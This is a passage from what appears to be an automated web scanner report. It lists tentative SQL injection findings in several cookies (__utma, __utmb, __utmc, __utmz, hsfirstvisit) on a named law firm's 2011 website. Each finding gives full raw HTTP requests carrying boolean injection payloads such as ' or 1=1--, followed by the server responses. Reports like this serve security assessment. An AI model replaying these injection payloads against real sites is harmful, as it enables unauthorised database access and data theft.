Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 10291203'%20or%201%3d1--%20 and 10291203'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.210291203'%20or%201%3d1--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 16:10:44 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.210291203'%20or%201%3d2--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.89. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 19736969'%20or%201%3d1--%20 and 19736969'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.130521654019736969'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 12-May-2010 16:12:12 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.130521654019736969'%20or%201%3d2--%20; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.90. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 11204199%20or%201%3d1--%20 and 11204199%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=24928704611204199%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 16:12:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=24928704611204199%20or%201%3d2--%20

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.91. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 17691360'%20or%201%3d1--%20 and 17691360'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman17691360'%20or%201%3d1--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 16:10:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman17691360'%20or%201%3d2--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.92. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 90477653'%20or%201%3d1--%20 and 90477653'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4690477653'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 16:11:29 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4690477653'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


